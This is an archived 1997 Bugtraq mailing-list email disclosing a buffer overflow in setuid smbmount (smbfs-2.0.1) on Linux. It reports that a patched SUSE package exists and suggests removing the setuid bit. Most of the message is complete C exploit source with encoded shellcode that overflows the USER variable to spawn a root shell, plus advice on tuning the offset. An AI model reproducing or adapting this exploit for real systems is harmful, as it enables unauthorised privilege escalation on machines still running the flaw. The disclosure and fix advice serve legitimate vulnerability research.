From - Tue Aug 05 09:47:11 1997 Return-Path: Received: from mwunix.mitre.org by smiley. (4.1/SMI-4.1) id AA25564; Fri, 27 Jun 97 14:28:26 EDT Received: from mbunix.mitre.org (mbunix.mitre.org [129.83.20.100]) by mwunix.mitre.org (8.8.5/8.8.5/mitre.0) with ESMTP id OAA09836; Fri, 27 Jun 1997 14:29:25 -0400 (EDT) Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143]) by mbunix.mitre.org (8.8.5/8.8.5/mitre.0) with ESMTP id OAA16993; Fri, 27 Jun 1997 14:29:21 -0400 (EDT) Received: from unknown@netspace.org (port 37382 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <35635-9811>; Fri, 27 Jun 1997 13:55:12 -0400 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with spool id 4272891 for BUGTRAQ@NETSPACE.ORG; Fri, 27 Jun 1997 13:50:03 -0400 Received: from brimstone.netspace.org (brimstone [128.148.157.143]) by netspace.org (8.8.5/8.8.2) with ESMTP id NAA19004 for ; Fri, 27 Jun 1997 13:39:09 -0400 Received: from unknown@netspace.org (port 37382 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <32795-9807>; Fri, 27 Jun 1997 13:39:11 -0400 Approved-By: aleph1@UNDERGROUND.ORG Received: from freeside.fc.net (freeside.fc.net [207.170.70.2]) by netspace.org (8.8.5/8.8.2) with ESMTP id MAA12979 for ; Fri, 27 Jun 1997 12:54:12 -0400 Received: from nsb1.nimh.nih.gov (nsb1.nimh.nih.gov [128.231.134.2]) by freeside.fc.net (8.8.5/8.6.6) with ESMTP id LAA27770 for ; Fri, 27 Jun 1997 11:53:05 -0500 (CDT) Received: from nsb2.nimh.nih.gov (gbritton@nsb2.nimh.nih.gov [128.231.134.3]) by nsb1.nimh.nih.gov (8.7.5/8.7.2) with SMTP id MAA10287; Fri, 27 Jun 1997 12:55:07 -0400 (EDT) Received: from localhost by nsb2.nimh.nih.gov (SMI-8.6/SMI-SVR4) id MAA13438; Fri, 27 Jun 1997 12:53:52 -0400 X-Sender: gbritton@nsb2.nimh.nih.gov Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Message-Id: Date: Fri, 27 Jun 1997 12:53:52 -0400 Reply-To: Gerald Britton Sender: Bugtraq List From: Gerald Britton Subject: smbmount buffer overflow X-To: bugtraq@fc.net, linux-security@redhat.com To: BUGTRAQ@NETSPACE.ORG X-Mozilla-Status: 2001 This program exploits a buffer overflow in the smbmount from smbfs-2.0.1 Systems are only vunerable if the smbmount binary is installed suid root, the source distribution does this by default. Redhat does not install this suid root by default, so those systems are not vunerable to this attack. I have also recieved this note from S.u.S.E.: > A fixed samba package (with smbfs-2.0.2) is ready. It will be on > > ftp://ftp.suse.com/pub/suse_update/S.u.S.E.-4.4.1/n1/samba > > in a few minutes. S.u.S.E. Linux 5.0 will include this version also. Here is the source for the exploit, the default parameters to the program often work, however I have found that the offset parameter sometimes varies wildly, values between -600 and -100 usually work though, a quick shell script will scan through these. ----------8<----------8<----------8<----------8<----------8<---------- /* ** smbexpl -- a smbmount root exploit under Linux ** ** Author: Gerald Britton ** ** This code exploits a buffer overflow in smbmount from smbfs-2.0.1. ** The code does not do range checking when copying a username from ** the environment variables USER or LOGNAME. To get this far into ** the code we need to execute with dummy arguments of a server and a ** mountpoint to use (./a in this case). The user will need to create ** the ./a directory and then execute smbexpl to gain root. This code ** is also setup to use /tmp/sh as the shell as bash-2.01 appears to ** do a seteuid(getuid()) so /bin/sh on my system won't work. Finally ** a "-Q" (an invalid commandline argument) causes smbmount to fail when ** parsing args and terminate, thus jumping into our shellcode. ** ** The shellcode used in this program also needed to be specialized as ** smbmount toupper()'s the contents of the USER variable. Self modifying ** code was needed to ensure that the shellcode will survive toupper(). ** ** The quick fix for the security problem: ** chmod -s /sbin/smbmount ** ** A better fix would be to patch smbmount to do bounds checking when ** copying the contents of the USER and LOGNAME variables. ** */ #include #include #define DEFAULT_OFFSET -202 #define DEFAULT_BUFFER_SIZE 211 #define DEFAULT_ALIGNMENT 2 #define NOP 0x90 /* This shell code is designed to survive being filtered by toupper() */ char shellcode[] = "\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40" "\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20" "\xeb\x05\xe8\xdb\xff\xff\xff" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int alignment=DEFAULT_ALIGNMENT; int i; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) alignment = atoi(argv[3]); printf("bsize=%d offset=%d alignment=%d\n",bsize,offset,alignment); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() - offset; fprintf(stderr,"Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) (ptr+alignment); for (i = 0; i < bsize-alignment; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize/2; i++) buff[i] = NOP; ptr = buff + (128 - strlen(shellcode)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; setenv("USER",buff,1); execl("/sbin/smbmount","smbmount","//a/a","./a","-Q",0); } ----------8<----------8<----------8<----------8<----------8<---------- -- Gerald Britton gbritton@nih.gov